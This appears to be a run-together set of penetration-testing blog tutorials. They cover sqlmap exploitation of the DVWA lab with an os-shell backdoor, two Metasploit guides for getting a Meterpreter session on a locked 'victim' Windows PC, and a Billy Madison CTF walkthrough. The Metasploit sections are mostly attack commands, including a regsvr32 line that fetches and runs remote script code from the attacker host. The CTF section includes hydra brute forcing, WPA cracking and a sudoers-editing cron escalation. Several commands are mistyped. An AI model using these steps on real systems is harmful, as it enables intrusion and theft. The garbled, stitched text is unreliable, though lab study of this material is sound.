SQL Injection Exploitation in DVWA (Bypass All Security)

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

www.owasp.org/index.php/SQL_Injection

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.  

Turn on burp suite in kali Linux click on proxy in menu bar and go for intercept is on button. Come to back and click on submit button in browser. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers. Copy the complete detail of intercept; past on leafpad; save on desktop as 1.

Open terminal and type following command for SQL injection attack using Sqlmap.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump all --os-shell

sqlmap is an open source penetration testing tool that self-regulates the process of detecting and exploiting SQL injection vulnerabilities and taking over of database servers. -r is used for recursions which will analysis your intercepted data from path/root/Desktop/1.

Things that to be notice is I have used –dbs in above command which fetched all database names as you can see in below image. Then it will ask to store hashes in temporary file type y and hit enter.

Now next it extracts table: user for database DVWA which I have mentioned in above command as –D dvwa.

Grateful we have penetrated the user table successfully. Please have a look over fetched data you will find that it dumps login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Now this tool is going to use a web backdoor for command prompt where it will ask to choose language for backdoor

Type 4 and hit enter.

Afterwards it will ask to choose any options for location for writable directory.

Type 1 and hit enter.

You can see the backdoor has been successfully uploaded on destination folder. Type y for retrieved the command standard output. Now I am inside the os-shell which I have mentioned in above command as os-shell.

Os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

From the list of vulnerability select SQL Injection for your attack. Select user ID: 2 from list. Set proxy turn on intercept tab in burp suite and come back to web browser for submit. 

Follow the same process save the selected detail fetched by intercept on the desktop as file: 2.

Now security level is increased so I was unable to get os-shell but successful received all detail of database by typing following command on terminal.

sqlmap -r /root/Desktop/2 --dbs -D dvwa --dump all

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

Here you find different scenario when you will select SQL Injection don’t get panic follow the step carefully this level is as similar as low level security. For hint the developer told that he had redirect the submit user ID to another page through POST action.

Click on link here to change your ID which will redirect to new window type ID: 1 turn on intercept then comes back and clicks on submit.

Now compare the intercepted data of both levels high and low you will find that POST action is use in high security as well as GET action is used in low security level. Copy the complete data and make following change in it. For help please look at below images.

Past the copied data to a leafpad replace POST from GET and add /?id=1&Submit=Submit save your file:third on desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Here go with flow!!!

Same process as above and this time again I will try for os-shell.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump all --os-shell

Again I have got all database names including dvwa. Now again type y for further process.

Table: user for database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbook for database DVWA which having only 1 entry.

Oops!! Fail to get os-shell but we have retrieve database of dvwa under high security.

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

Lets learn how to take Meterpreter session of a pc in a network which is switched on but is locked and has remote desktop feature enabled on it.

Let us assume that our victim’s pc already has utilman attack or sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys .

You donot need physical access to the victim’s pc for this attack.

First, run metasploit on your pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim’s pc and enter the victim’s ip.

$rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.

Press the “shift” key 5 times to bring up the command prompt.

And returning to our previous terminal with meterpreter, we have finally got the session of victim’s pc on out terminal.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

Hack Lock PC in Network using Metasploit

Today we will discover how to take Meterpreter session of a pc in a network which is switched on but is locked.

Let us assume that our victim’s pc already has sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You will need physical access to the victim’s pc for this attack. Press the “shift” key 5 times on the victim’s pc to bring up the command prompt.

Next, we run metasploit on our own pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Take down the command generated by metasploit and run it on the victim pc’s command prompt

Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll

Voila, we have the session of victim’s pc on our meterpreter.

Hack the Billy Madison VM (CTF Challenge)

Today in our CTF challenges we are going to do Billy Madison. This VM is based on 90’s movie Billy Madison, hence the name of the VM. The main aim of this VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy's 12th grade final project. You will probably need to root the VM to complete this objective. Without further ado let’s start.

Download the lab from: https://www.vulnhub.com/entry/billy-madison-11,161/

WalkThrough

Let’s locate our target

Our target is 192.168.1.103. Scan it with nmap.

nmap –p- -A 192.168.1.103

Okay! So from nmap we have discovered the port : 22, 23, 69, 80, 137, 138, 139, 445, 2525. So, I opened our target in the browser at port 69.

A Wordpress website opens. I explored this lot and tried to exploit it but it was useless. So I simply opened our target in the browser at its by-default port i.e. 80. The following page opens:

Then I explored smb port.

smbclient –L 192.168.0.103

When it asks for password then just hit enter without entering a password.

Here, I found an EricSecretStuff folder. Let’s see what it has to offer and for that type the combination of the following commands:

smbclient //192.168.0.103/EricSecretStuff

dir

get ebd.txt

exit

cat ebd.txt

It just told us that backdoor are currently closed. So then I traversed telnet.

telnet 192.168.0.103

There was a message in telnet telling us the password and that it has been encrypted with ROT13(hint: ROTten). Let’s decode it.

By decrypting it, it comes to be as exschmenuating. Now this could be a directory so I opened it in the browser

Now in the browser it opened a webpage which gave us few hints for moving forward. Through conclusion we now know that there is .cap file. And that it is saved with the name which includes ‘veronica’ and that name and be derived from rockyou.txt.

Now there are many names in rockyou.txt but we only need the ones with have veronica in it and for that use the following command:

grep –I veronica /usr/share/wordslists/rockyou.txt > /root/Desktop/dict.txt

Execution of the above command will create a text file with names veronica in it. Now use this text file and find the file which had veronica in it through DirBuster. And for this, open DirBuster and give the URL in the Target URL text box and then give the path of the text file you just created using grep command. Give the directory name in Dir to start with text box and then give cap as the file extension.

As a result it will show you 012987veronica.cap file.

Open it in the browser. It will ask you to download it, go ahead with it.

Now check the TCP stream of every packet. In of it you will find an email sent from Eric to Veronica, telling her to download a certain antivirus.

In another TCP stream you will find that Veronica has replied to Eric, saying that to share the link through FTP server along with a youtube link.

Again in a TCP stream of a packet you will find that Eric has told her about his username and password

Ok! So we have eric’s username and password. Keep that with you for later use. Meanwhile, let’s check out the youtube link.

In the video it says the combination of some numbers. Now these numbers could be used for port knocking. So, let’s try it.

For x in 1466 67 1468 1514 1981 1986; do nmap –Pn –host_timeout 201 –max-retries 0 –p $x 192.168.0.103; done

Then to check I fired up the nmap again.

nmap –p- 192.168.0.103

And Voila!! FTP port opened on 21. Lets’ enter through it now as we have username and password. Remember The password and username for eric we discovered earlier.

ftp 192.168.0.103

Now let’s see the directories in it.

dir

There is a file named .notes. I decided to read it but before doing so I had to download it, therefore, type :

get .notes

exit

Now that notes file is downloaded, type the following command in the terminal of kali to read it:

cat .notes

There was a message in the notes by eric. Now if you remember the conversation of veronica and eric then you would know that there are two users on ftp server. second one is veronica. Naturally I decided to use hydra to apply the brute force attack on FTP to get the username and password using the same dictionary file which I had created with grep.

hydra –l veronica –p /root/Desktop/ver.txt ftp://192.168.0.103

And yes!! We have the password along with username i.e. veronica and babygirl_veronica07@yahoo.com respectively. Then I decided to explore more of FTP with veronica's username and password and I found two files there: one is of .cap and other .eml and downloaded then both and to achieve so type the combination of the following commands:

 ftp 192.168.0.103

dir

binary

get eg-01.cap

get email-from-billy.eml

Let’s read the email now.

In the mail he says how he hacks Eric’s wireless password. But if you observe everything you will find that he has used swaks to send this mail. Now swaks is a SMTP server that is a featureful, flexible, scriptable, transaction-oriented tool developed by John Jetmore. So, therefore I used the following command next:

swaks –to eric@madisonhotels.com –from vvaughn@polyfector.edu –server 192.168.0.104:2525 – body “My kid will be a soccer player”  --header “Subject: My kid will be soccer player”

Further I used aircrack-ng to monitor eg-01.cap to because the email that was sent through the swaks mentioned something about wifi password.

aircrack-ng /root/Desktop/eg-01.cap –w /usr/share/wordlists/rockyou.txt

And with aircrack-ng we found the password of wireless i.e. triscuit*. 

Now if you again scan it with nmap.

nmap –p- -A 192.168.0.103

As a result you can see that a new port opens i.e. 1974 with SSH service. Let’s try and log in with SSH.

ssh eric@192.168.0.103 –p 1974

And then give the password triscuit*. Once I was logged in I checked it linux’s version with the following command but it was not exploitable.

lsb_release –a

Then typed following command to see what it has to offer :

ls

There I found a text file so I decided to read it.

cat why-1974.txt

Then type the following command:

find / -perm -2000 –types f 2>/dev/null

I was pretty lost here so decided to take some help from Mr. Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and so type the following set of commands:

touch /tmp/test

usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test

echo –e ‘#!/bin/bash\necho “eric ALL=(ALL) NOPASSWORD:ALL” >> /etc/sudoers’ > 

/etc/cron.hourly/test

chmod +x /etc/cron.hourly/test

cat /etc/chron.hourly/test

This way you will escalate the privileges and reach root. Lets see what files root has:

ls

I decided to read /PRIVATE file.

cd /PRIVATE

ls

Here, I found a hint.txt and BowelMovement files. First I opened hint.txt.

cat hint.txt

In this file he is talking about the BowelMovement file and about its password which is the link 

given. So I copied the BowelMovement file.

cp BowelMovement /var/www/html

 And then I created a dictionary file using cewl and that link.

cewl –depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt

By brute forcing you will find the correct password from this dictionary file. Using that password open the BowelMovement file that you have downloaded.

And then open the same in the terminal of kali and type :

ls

There is a file called secret.zip, unzip it.

unzip secret.zip

In the zipped folder there were two files. I decided to read them both.

cat THE-END.txt

cat Billy_Madison12th_Grade_Fimal_Project.doc

Finally! We have solved the CTF. Enjoy!